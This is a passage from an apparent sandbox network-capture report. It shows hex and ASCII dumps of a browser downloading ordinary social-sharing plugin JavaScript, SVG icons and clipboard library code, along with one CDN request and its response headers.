                                                                                              Data Ascii: ://www.w3.org/2000/svg" width="100%" height="100%" viewBox="0 0 32 32"><path fill="#fff" d="M16.005 6.244c2.927 0 5.854-.002 8.782 0 1.396.002 2.195.78 2.188 2.165-.015 2.483.116 4.985-.11 7.454-.75 8.204-10.027 12.607-16.91 8.064-3.086-2.037-4.82-4.926-4
                                                                                              2021-12-13 23:57:32 UTC8742INData Raw: 63 69 73 69 6f 6e 3b 20 69 6d 61 67 65 2d 72 65 6e 64 65 72 69 6e 67 3a 6f 70 74 69 6d 69 7a 65 51 75 61 6c 69 74 79 3b 20 66 69 6c 6c 2d 72 75 6c 65 3a 65 76 65 6e 6f 64 64 3b 20 63 6c 69 70 2d 72 75 6c 65 3a 65 76 65 6e 6f 64 64 22 20 76 69 65 77 42 6f 78 3d 22 2d 31 31 30 20 2d 31 32 30 20 34 32 38 20 34 39 34 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 3c 67 3e 3c 70 6f 6c 79 67 6f 6e 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 70 6f 69 6e 74 73 3d 22 31 30 38 2c 32 37 34 20 34 38 2c 32 37 34 20 34 38 2c 31 35 32 20 30 2c 31 35 32 20 30 2c 39 35 20 34 38 2c 39 35 20 34 38 2c 30 20 32 30 38 2c 30 20 32 30 38 2c 35 36 20 31 30 38 2c 35 36 20 31 30 38 2c 39 35 20 31 38
                                                                                              Data Ascii: cision; image-rendering:optimizeQuality; fill-rule:evenodd; clip-rule:evenodd" viewBox="-110 -120 428 494" xmlns:xlink="http://www.w3.org/1999/xlink"><g><polygon fill="#fff" points="108,274 48,274 48,152 0,152 0,95 48,95 48,0 208,0 208,56 108,56 108,95 18
                                                                                              2021-12-13 23:57:32 UTC8743INData Raw: 37 20 37 68 34 2e 35 76 34 2e 35 48 37 7a 6d 36 2e 37 35 20 30 68 34 2e 35 76 34 2e 35 68 2d 34 2e 35 7a 6d 36 2e 37 35 20 30 48 32 35 76 34 2e 35 68 2d 34 2e 35 7a 4d 37 20 31 33 2e 37 35 68 34 2e 35 76 34 2e 35 48 37 7a 6d 36 2e 37 35 20 30 68 34 2e 35 76 34 2e 35 68 2d 34 2e 35 7a 6d 36 2e 37 35 20 30 48 32 35 76 34 2e 35 68 2d 34 2e 35 7a 4d 37 20 32 30 2e 35 68 34 2e 35 56 32 35 48 37 7a 6d 36 2e 37 35 20 30 68 34 2e 35 56 32 35 68 2d 34 2e 35 7a 6d 36 2e 37 35 20 30 48 32 35 56 32 35 68 2d 34 2e 35 7a 22 20 66 69 6c 6c 3d 22 23 46 46 46 22 2f 3e 3c 2f 73 76 67 3e 27 7d 2c 4f 75 74 6c 6f 6f 6b 5f 63 6f 6d 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 3a 22 23 30 30 37 32 63 36 22 2c 74 69 74 6c 65 3a 22 4f 75 74 6c 6f 6f 6b 2e 63 6f 6d 22 2c
                                                                                              Data Ascii: 7 7h4.5v4.5H7zm6.75 0h4.5v4.5h-4.5zm6.75 0H25v4.5h-4.5zM7 13.75h4.5v4.5H7zm6.75 0h4.5v4.5h-4.5zm6.75 0H25v4.5h-4.5zM7 20.5h4.5V25H7zm6.75 0h4.5V25h-4.5zm6.75 0H25V25h-4.5z" fill="#FFF"/></svg>'},Outlook_com:{background_color:"#0072c6",title:"Outlook.com",
                                                                                              2021-12-13 23:57:32 UTC8744INData Raw: 2c 72 65 64 69 72 65 63 74 5f 75 72 6c 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 61 6c 61 74 61 72 69 6e 2e 63 6f 6d 2f 6c 6f 67 69 6e 22 2c 73 76 67 3a 27 3c 73 76 67 20 66 6f 63 75 73 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 32 20 33 32 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 42 39 30 45 31 30 22 20 64 3d 22 4d 32 39 20 31 37 48 33 76 31 30 63 30 20 31 2e 31 2e 39 20 32 20 32 20 32 68 32 32 63 31 2e 31 20 30 20 32 2d 2e 39 20 32 2d 32 56 31 37 7a 22 2f 3e 3c 70 61 74
                                                                                              Data Ascii: ,redirect_url:"https://www.balatarin.com/login",svg:'<svg focusable="false" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" viewBox="0 0 32 32"><path fill="#B90E10" d="M29 17H3v10c0 1.1.9 2 2 2h22c1.1 0 2-.9 2-2V17z"/><pat
                                                                                              2021-12-13 23:57:32 UTC8746INData Raw: 31 2e 35 36 61 31 2e 35 36 20 31 2e 35 36 20 30 20 31 20 30 20 32 2e 34 36 38 2d 31 2e 32 37 6c 31 2e 39 35 2d 33 2e 39 32 36 63 2e 31 34 36 2e 30 34 35 2e 32 39 37 2e 30 37 36 2e 34 35 38 2e 30 37 36 2e 32 35 20 30 20 2e 34 38 34 2d 2e 30 36 34 2e 36 39 34 2d 2e 31 37 6c 35 2e 39 30 37 20 38 2e 32 61 31 2e 35 36 20 31 2e 35 36 20 30 20 31 20 30 20 31 2e 31 30 33 2d 2e 34 35 39 7a 4d 31 38 2e 39 31 34 20 38 2e 35 39 63 30 2d 2e 31 39 37 2d 2e 30 34 2d 2e 33 38 33 2d 2e 31 30 36 2d 2e 35 35 36 6c 34 2e 32 35 37 2d 32 2e 34 37 33 63 2e 32 33 36 2e 32 39 2e 35 36 37 2e 34 39 2e 39 35 2e 35 35 76 34 2e 39 36 61 31 2e 35 35 38 20 31 2e 35 35 38 20 30 20 30 20 30 2d 31 2e 31 39 37 20 32 2e 31 31 35 6c 2d 34 2e 32 37 38 20 32 2e 35 37 33 61 31 2e 35 34 32 20 31
                                                                                              Data Ascii: 1.56a1.56 1.56 0 1 0 2.468-1.27l1.95-3.926c.146.045.297.076.458.076.25 0 .484-.064.694-.17l5.907 8.2a1.56 1.56 0 1 0 1.103-.459zM18.914 8.59c0-.197-.04-.383-.106-.556l4.257-2.473c.236.29.567.49.95.55v4.96a1.558 1.558 0 0 0-1.197 2.115l-4.278 2.573a1.542 1
                                                                                              2021-12-13 23:57:32 UTC8747INData Raw: 35 20 34 2e 33 38 6c 33 2e 39 35 38 20 32 2e 35 36 36 2d 33 2e 38 34 20 32 2e 33 39 7a 22 2f 3e 3c 2f 67 3e 3c 2f 73 76 67 3e 27 7d 2c 42 6c 6f 67 4d 61 72 6b 73 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 3a 22 23 35 33 35 33 35 33 22 2c 74 69 74 6c 65 3a 22 42 6c 6f 67 4d 61 72 6b 73 22 2c 72 65 64 69 72 65 63 74 5f 75 72 6c 3a 22 68 74 74 70 73 3a 2f 2f 62 6c 6f 67 6d 61 72 6b 73 2e 6e 65 74 2f 6d 79 2f 6e 65 77 2e 70 68 70 3f 6d 69 6e 69 3d 31 26 73 69 6d 70 6c 65 3d 31 26 74 69 74 6c 65 3d 22 2b 62 2b 22 26 75 72 6c 3d 22 2b 61 2c 73 76 67 3a 27 3c 73 76 67 20 66 6f 63 75 73 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67
                                                                                              Data Ascii: 5 4.38l3.958 2.566-3.84 2.39z"/></g></svg>'},BlogMarks:{background_color:"#535353",title:"BlogMarks",redirect_url:"https://blogmarks.net/my/new.php?mini=1&simple=1&title="+b+"&url="+a,svg:'<svg focusable="false" aria-hidden="true" xmlns="http://www.w3.org
                                                                                              2021-12-13 23:57:32 UTC8751INData Raw: 33 2e 38 39 2d 31 2e 37 39 38 2d 36 2e 30 30 38 2d 32 2e 32 33 33 2d 2e 34 37 2d 2e 30 39 37 2d 2e 39 37 37 2d 2e 31 30 37 2d 31 2e 32 35 2e 34 31 2d 2e 32 35 2e 34 37 34 2d 2e 30 39 33 2e 39 33 36 2e 31 39 20 31 2e 33 34 2e 31 35 33 2e 32 32 32 2e 33 34 37 2e 34 33 34 2e 35 36 36 2e 35 38 35 20 32 2e 34 34 20 31 2e 36 37 38 20 34 2e 33 30 33 20 33 2e 39 33 20 36 2e 32 31 32 20 36 2e 31 34 35 2e 34 34 36 2e 35 31 37 2e 38 39 36 20 31 2e 30 32 37 20 31 2e 36 36 35 20 31 2e 30 36 35 2e 32 35 2e 30 31 32 2e 34 35 35 2e 31 33 32 2e 34 34 35 2e 34 34 36 76 2e 31 32 33 63 2e 30 34 37 2e 38 32 37 2e 32 35 20 31 2e 35 2e 37 37 34 20 32 2e 32 38 20 31 2e 33 36 35 20 31 2e 36 37 20 33 2e 30 38 20 32 2e 38 38 20 35 2e 30 35 34 20 33 2e 37 2e 34 2e 31 36 37 2e 37 33
                                                                                              Data Ascii: 3.89-1.798-6.008-2.233-.47-.097-.977-.107-1.25.41-.25.474-.093.936.19 1.34.153.222.347.434.566.585 2.44 1.678 4.303 3.93 6.212 6.145.446.517.896 1.027 1.665 1.065.25.012.455.132.445.446v.123c.047.827.25 1.5.774 2.28 1.365 1.67 3.08 2.88 5.054 3.7.4.167.73
                                                                                              2021-12-13 23:57:32 UTC8755INData Raw: 73 76 67 3e 27 7d 2c 4a 61 6d 65 73 70 6f 74 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 3a 22 23 66 66 39 65 32 63 22 2c 74 69 74 6c 65 3a 22 4a 61 6d 65 73 70 6f 74 22 2c 72 65 64 69 72 65 63 74 5f 75 72 6c 3a 22 68 74 74 70 3a 2f 2f 6d 79 2e 6a 61 6d 65 73 70 6f 74 2e 63 6f 6d 2f 22 2c 73 76 67 3a 27 3c 73 76 67 20 66 6f 63 75 73 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 32 20 33 32 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 31 32 2e 34
                                                                                              Data Ascii: svg>'},Jamespot:{background_color:"#ff9e2c",title:"Jamespot",redirect_url:"http://my.jamespot.com/",svg:'<svg focusable="false" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" viewBox="0 0 32 32"><path fill="#fff" d="M12.4
                                                                                              2021-12-13 23:57:32 UTC8758INData Raw: 37 66 66 38 0d 0a 63 30 20 2e 34 37 38 2d 2e 30 32 32 2e 37 38 2d 2e 30 37 36 2e 39 30 33 2d 2e 30 36 32 2e 31 35 33 2d 2e 31 35 34 2e 32 36 2d 2e 32 38 35 2e 33 33 2d 2e 31 33 32 2e 30 37 2d 2e 33 39 34 2e 31 31 2d 2e 37 38 2e 31 31 48 38 2e 38 76 32 2e 31 32 68 36 2e 36 36 36 76 2d 32 2e 31 32 68 2d 2e 35 35 36 63 2d 2e 33 36 33 20 30 2d 2e 36 31 2d 2e 30 33 32 2d 2e 37 33 33 2d 2e 30 39 34 73 2d 2e 32 31 36 2d 2e 31 36 32 2d 2e 32 37 38 2d 2e 33 31 63 2d 2e 30 36 33 2d 2e 31 34 35 2d 2e 31 2d 2e 34 30 38 2d 2e 31 2d 2e 37 38 36 76 2d 31 2e 35 34 33 6c 32 2e 30 36 37 2d 32 2e 30 31 33 20 32 2e 34 20 33 2e 38 34 32 63 2e 32 2e 33 33 32 2e 33 2e 35 34 2e 33 2e 36 32 35 20 30 20 2e 30 37 37 2d 2e 30 35 34 2e 31 34 37 2d 2e 31 36 32 2e 32 2d 2e 31 30 38 2e
                                                                                              Data Ascii: 7ff8c0 .478-.022.78-.076.903-.062.153-.154.26-.285.33-.132.07-.394.11-.78.11H8.8v2.12h6.666v-2.12h-.556c-.363 0-.61-.032-.733-.094s-.216-.162-.278-.31c-.063-.145-.1-.408-.1-.786v-1.543l2.067-2.013 2.4 3.842c.2.332.3.54.3.625 0 .077-.054.147-.162.2-.108.
                                                                                              2021-12-13 23:57:32 UTC8762INData Raw: 37 38 34 20 35 2e 34 35 34 6c 2d 2e 36 38 2d 31 2e 30 30 34 63 2e 36 30 34 2d 2e 38 36 20 32 2e 35 32 2d 35 2e 32 32 34 20 38 2e 34 38 34 2d 35 2e 39 34 2e 32 37 2e 32 35 38 2e 34 31 35 2e 36 39 32 2e 36 33 36 20 31 2e 30 34 7a 22 2f 3e 3c 2f 73 76 67 3e 27 7d 2c 4d 61 69 6c 5f 52 75 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 3a 22 23 33 35 36 66 61 63 22 2c 74 69 74 6c 65 3a 22 4d 61 69 6c 2e 52 75 22 2c 72 65 64 69 72 65 63 74 5f 75 72 6c 3a 22 68 74 74 70 73 3a 2f 2f 63 6f 6e 6e 65 63 74 2e 6d 61 69 6c 2e 72 75 2f 73 68 61 72 65 3f 73 68 61 72 65 5f 75 72 6c 3d 22 2b 61 2c 73 76 67 3a 27 3c 73 76 67 20 66 6f 63 75 73 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74
                                                                                              Data Ascii: 784 5.454l-.68-1.004c.604-.86 2.52-5.224 8.484-5.94.27.258.415.692.636 1.04z"/></svg>'},Mail_Ru:{background_color:"#356fac",title:"Mail.Ru",redirect_url:"https://connect.mail.ru/share?share_url="+a,svg:'<svg focusable="false" aria-hidden="true" xmlns="htt
                                                                                              2021-12-13 23:57:32 UTC8766INData Raw: 32 2e 32 31 34 63 30 2d 2e 30 36 35 20 30 2d 2e 31 32 2e 30 30 39 2d 2e 31 37 36 2e 30 39 33 2d 31 2e 32 31 33 20 31 2e 31 33 2d 32 2e 31 37 37 20 32 2e 33 39 2d 32 2e 31 37 37 20 31 2e 33 32 35 20 30 20 32 2e 33 39 39 20 31 2e 30 35 36 20 32 2e 33 39 39 20 32 2e 33 36 32 76 39 2e 32 32 36 63 30 20 31 2e 33 30 36 20 31 2e 30 37 34 20 32 2e 33 35 33 20 32 2e 33 39 39 20 32 2e 33 35 33 73 32 2e 33 39 39 2d 31 2e 30 35 36 20 32 2e 33 39 39 2d 32 2e 33 35 33 76 2d 36 2e 32 30 36 63 30 2d 35 2e 31 33 32 20 34 2e 32 33 33 2d 39 2e 32 39 31 20 39 2e 34 36 37 2d 39 2e 32 39 31 48 34 7a 22 2f 3e 3c 70 61 74 68 20 6f 70 61 63 69 74 79 3d 22 2e 38 22 20 64 3d 22 4d 34 20 31 37 2e 30 37 34 76 38 2e 34 33 38 63 30 20 31 2e 33 30 36 20 31 2e 30 37 34 20 32 2e 33 36 32
                                                                                              Data Ascii: 2.214c0-.065 0-.12.009-.176.093-1.213 1.13-2.177 2.39-2.177 1.325 0 2.399 1.056 2.399 2.362v9.226c0 1.306 1.074 2.353 2.399 2.353s2.399-1.056 2.399-2.353v-6.206c0-5.132 4.233-9.291 9.467-9.291H4z"/><path opacity=".8" d="M4 17.074v8.438c0 1.306 1.074 2.362
                                                                                              2021-12-13 23:57:32 UTC8770INData Raw: 72 3a 22 23 32 62 38 32 64 39 22 2c 74 69 74 6c 65 3a 22 51 7a 6f 6e 65 22 2c 72 65 64 69 72 65 63 74 5f 75 72 6c 3a 22 68 74 74 70 73 3a 2f 2f 73 6e 73 2e 71 7a 6f 6e 65 2e 71 71 2e 63 6f 6d 2f 63 67 69 2d 62 69 6e 2f 71 7a 73 68 61 72 65 2f 63 67 69 5f 71 7a 73 68 61 72 65 5f 6f 6e 65 6b 65 79 3f 75 72 6c 3d 22 2b 61 2c 73 76 67 3a 27 3c 73 76 67 20 66 6f 63 75 73 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 32 20 33 32 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20
                                                                                              Data Ascii: r:"#2b82d9",title:"Qzone",redirect_url:"https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url="+a,svg:'<svg focusable="false" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" viewBox="0 0 32 32"><path fill="#fff"
                                                                                              2021-12-13 23:57:32 UTC8774INData Raw: 31 35 61 31 2e 31 31 34 20 31 2e 31 31 34 20 30 20 30 20 31 2d 2e 31 34 37 2d 2e 35 35 35 63 30 2d 2e 34 30 35 2e 31 32 32 2d 2e 37 33 2e 33 36 36 2d 2e 39 37 35 2e 32 34 37 2d 2e 32 34 32 2e 36 34 36 2d 2e 34 34 20 31 2e 31 39 38 2d 2e 35 39 2e 36 32 2d 2e 31 37 20 31 2e 32 35 34 2d 2e 32 35 20 31 2e 39 31 2d 2e 32 35 7a 4d 31 30 2e 32 30 32 20 38 63 2e 35 39 33 20 30 20 31 2e 33 37 2e 31 39 20 32 2e 33 33 2e 35 37 34 61 2e 37 38 35 2e 37 38 35 20 30 20 30 20 30 20 2e 32 37 35 2e 30 36 38 63 2e 30 35 38 20 30 20 2e 32 33 2d 2e 30 36 38 2e 35 31 38 2d 2e 32 30 33 2e 30 39 33 2d 2e 30 35 2e 31 39 2d 2e 30 37 2e 32 39 34 2d 2e 30 37 2e 33 38 20 30 20 2e 37 39 2e 34 20 31 2e 32 32 20 31 2e 31 39 33 2e 34 33 2e 37 39 37 2e 36 34 20 31 2e 35 35 35 2e 36 34 20
                                                                                              Data Ascii: 15a1.114 1.114 0 0 1-.147-.555c0-.405.122-.73.366-.975.247-.242.646-.44 1.198-.59.62-.17 1.254-.25 1.91-.25zM10.202 8c.593 0 1.37.19 2.33.574a.785.785 0 0 0 .275.068c.058 0 .23-.068.518-.203.093-.05.19-.07.294-.07.38 0 .79.4 1.22 1.193.43.797.64 1.555.64
                                                                                              2021-12-13 23:57:32 UTC8779INData Raw: 31 2d 32 2e 34 36 33 2e 38 34 37 20 31 2e 38 34 34 20 31 2e 38 34 34 20 30 20 30 20 31 2d 2e 38 34 34 2d 32 2e 34 36 35 6c 32 2e 34 36 2d 35 2e 30 36 32 61 31 2e 38 34 34 20 31 2e 38 34 34 20 30 20 30 20 31 20 33 2e 33 31 34 20 31 2e 36 31 38 7a 6d 2d 2e 30 35 33 2d 37 2e 34 39 37 61 32 2e 33 39 34 20 32 2e 33 39 34 20 30 20 30 20 31 2d 31 2e 36 38 32 2e 36 39 38 20 32 2e 33 38 33 20 32 2e 33 38 33 20 30 20 30 20 31 2d 32 2e 33 37 38 2d 32 2e 33 37 38 63 30 2d 2e 36 32 36 2e 32 35 35 2d 31 2e 32 33 36 2e 37 2d 31 2e 36 38 2e 38 38 35 2d 2e 38 38 38 20 32 2e 34 38 2d 2e 38 38 38 20 33 2e 33 36 20 30 20 2e 34 34 32 2e 34 34 34 2e 36 39 36 20 31 2e 30 35 34 2e 36 39 36 20 31 2e 36 38 20 30 20 2e 36 32 36 2d 2e 32 35 34 20 31 2e 32 33 35 2d 2e 36 39 36 20 31
                                                                                              Data Ascii: 1-2.463.847 1.844 1.844 0 0 1-.844-2.465l2.46-5.062a1.844 1.844 0 0 1 3.314 1.618zm-.053-7.497a2.394 2.394 0 0 1-1.682.698 2.383 2.383 0 0 1-2.378-2.378c0-.626.255-1.236.7-1.68.885-.888 2.48-.888 3.36 0 .442.444.696 1.054.696 1.68 0 .626-.254 1.235-.696 1
                                                                                              2021-12-13 23:57:32 UTC8783INData Raw: 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 27 2b 63 5b 64 5d 2e 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 2b 27 3b 77 69 64 74 68 3a 32 32 70 78 3b 68 65 69 67 68 74 3a 32 32 70 78 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 22 20 74 69 74 6c 65 3d 22 27 2b 63 5b 64 5d 2e 74 69 74 6c 65 2b 27 22 3e 27 2b 63 5b 64 5d 2e 73 76 67 2b 27 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 34 70 78 3b 22 20 63 6c 61 73 73 3d 22 68 65 61 74 65 6f 72 5f 73 73 73 5f 6d 6f 72 65 5f 6c 61 62 65 6c 5f 27 2b 63 5b 64 5d 2e 74 69 74 6c 65 2e 72 65 70 6c 61 63 65 28 27
                                                                                              Data Ascii: round-color:'+c[d].background_color+';width:22px;height:22px;display:block;float:left;" title="'+c[d].title+'">'+c[d].svg+'</span><span style="display:block;float:left;margin-left:3px;line-height:24px;" class="heateor_sss_more_label_'+c[d].title.replace('
                                                                                              2021-12-13 23:57:32 UTC8795INData Raw: 2d 66 62 2d 73 68 61 72 65 73 27 29 29 2c 6a 51 75 65 72 79 28 64 29 2e 61 74 74 72 28 27 68 65 61 74 65 6f 72 2d 73 73 73 2d 66 62 2d 73 68 61 72 65 73 27 2c 62 2b 65 29 2c 6a 51 75 65 72 79 28 63 29 2e 68 74 6d 6c 28 68 65 61 74 65 6f 72 53 73 73 43 61 6c 63 75 6c 61 74 65 41 70 70 72 6f 78 43 6f 75 6e 74 28 62 2b 65 29 29 29 2c 28 74 79 70 65 6f 66 20 68 65 61 74 65 6f 72 53 73 73 52 65 64 75 63 65 48 6f 72 69 7a 6f 6e 74 61 6c 53 76 67 57 69 64 74 68 21 3d 27 75 6e 64 65 66 69 6e 65 64 27 26 26 6a 51 75 65 72 79 28 74 68 69 73 29 2e 68 61 73 43 6c 61 73 73 28 27 68 65 61 74 65 6f 72 5f 73 73 73 5f 68 6f 72 69 7a 6f 6e 74 61 6c 5f 73 68 61 72 69 6e 67 27 29 7c 7c 74 79 70 65 6f 66 20 68 65 61 74 65 6f 72 53 73 73 52 65 64 75 63 65 56 65 72 74 69 63 61
                                                                                              Data Ascii: -fb-shares')),jQuery(d).attr('heateor-sss-fb-shares',b+e),jQuery(c).html(heateorSssCalculateApproxCount(b+e))),(typeof heateorSssReduceHorizontalSvgWidth!='undefined'&&jQuery(this).hasClass('heateor_sss_horizontal_sharing')||typeof heateorSssReduceVertica
                                                                                              2021-12-13 23:57:32 UTC8798INData Raw: 33 30 33 36 0d 0a 61 74 65 6f 72 5f 73 73 73 5f 6d 6f 62 69 6c 65 5f 66 6f 6f 74 65 72 27 3e 3c 2f 64 69 76 3e 22 29 2c 63 3d 6e 65 77 20 43 6c 69 70 62 6f 61 72 64 4a 53 28 27 61 2e 68 65 61 74 65 6f 72 5f 73 73 73 5f 62 75 74 74 6f 6e 5f 63 6f 70 79 5f 6c 69 6e 6b 2c 20 73 70 61 6e 2e 68 65 61 74 65 6f 72 5f 73 73 73 5f 73 5f 63 6f 70 79 5f 6c 69 6e 6b 2c 20 73 70 61 6e 2e 68 65 61 74 65 6f 72 5f 73 73 73 5f 73 5f 63 6f 70 79 5f 6c 69 6e 6b 20 73 76 67 2c 20 73 70 61 6e 2e 68 65 61 74 65 6f 72 5f 73 73 73 5f 6d 6f 72 65 5f 6c 61 62 65 6c 5f 63 6f 70 79 5f 6c 69 6e 6b 27 2c 7b 74 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 61 2c 63 3b 72 65 74 75 72 6e 20 6a 51 75 65 72 79 28 62 29 2e 68 61 73 43 6c 61 73 73 28 27 68 65 61 74 65 6f 72 5f
                                                                                              Data Ascii: 3036ateor_sss_mobile_footer'></div>"),c=new ClipboardJS('a.heateor_sss_button_copy_link, span.heateor_sss_s_copy_link, span.heateor_sss_s_copy_link svg, span.heateor_sss_more_label_copy_link',{text:function(b){var a,c;return jQuery(b).hasClass('heateor_
                                                                                              2021-12-13 23:57:32 UTC8803INData Raw: 20 76 6f 69 64 20 30 21 3d 3d 62 26 26 28 22 5b 6f 62 6a 65 63 74 20 4e 6f 64 65 4c 69 73 74 5d 22 3d 3d 3d 63 7c 7c 22 5b 6f 62 6a 65 63 74 20 48 54 4d 4c 43 6f 6c 6c 65 63 74 69 6f 6e 5d 22 3d 3d 3d 63 29 26 26 22 6c 65 6e 67 74 68 22 69 6e 20 62 26 26 28 30 3d 3d 3d 62 2e 6c 65 6e 67 74 68 7c 7c 61 2e 6e 6f 64 65 28 62 5b 30 5d 29 29 7d 2c 61 2e 73 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 61 7c 7c 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 7d 2c 61 2e 66 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 22 5b 6f 62 6a 65 63 74 20 46 75 6e 63 74 69 6f 6e 5d 22 3d 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63
                                                                                              Data Ascii: void 0!==b&&("[object NodeList]"===c||"[object HTMLCollection]"===c)&&"length"in b&&(0===b.length||a.node(b[0]))},a.string=function(a){return"string"==typeof a||a instanceof String},a.fn=function(a){return"[object Function]"===Object.prototype.toString.c
                                                                                              2021-12-13 23:57:32 UTC8807INData Raw: 63 74 69 6f 6e 26 26 61 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 27 49 6e 76 61 6c 69 64 20 22 74 61 72 67 65 74 22 20 61 74 74 72 69 62 75 74 65 2e 20 50 6c 65 61 73 65 20 75 73 65 20 22 72 65 61 64 6f 6e 6c 79 22 20 69 6e 73 74 65 61 64 20 6f 66 20 22 64 69 73 61 62 6c 65 64 22 20 61 74 74 72 69 62 75 74 65 27 29 3b 69 66 28 22 63 75 74 22 3d 3d 3d 74 68 69 73 2e 61 63 74 69 6f 6e 26 26 28 61 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 72 65 61 64 6f 6e 6c 79 22 29 7c 7c 61 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 29 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 27 49 6e 76 61 6c 69 64 20 22 74 61 72 67 65 74 22 20 61 74 74 72 69
                                                                                              Data Ascii: ction&&a.hasAttribute("disabled"))throw new Error('Invalid "target" attribute. Please use "readonly" instead of "disabled" attribute');if("cut"===this.action&&(a.hasAttribute("readonly")||a.hasAttribute("disabled")))throw new Error('Invalid "target" attri
                                                                                              2021-12-13 23:57:32 UTC8810INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              27192.168.2.349788104.16.18.94443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:32 UTC8687OUTGET /gh/taufik-nurrohman/f3h/v1.0.12/f3h.min.js HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: cdn.statically.io
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:32 UTC8787INHTTP/1.1 200 OK
                                                                                              Date: Mon, 13 Dec 2021 23:57:32 GMT
                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              CF-Ray: 6bd322a80d236901-FRA
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Age: 176186
                                                                                              Cache-Control: public, max-age=31536000, immutable
                                                                                              ETag: W/"70b28a62f7ce8ec1f79261bbb98af4790cdf7a337db3929caac331d14dd72844"
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: HIT
                                                                                              Access-Control-Expose-Headers: *
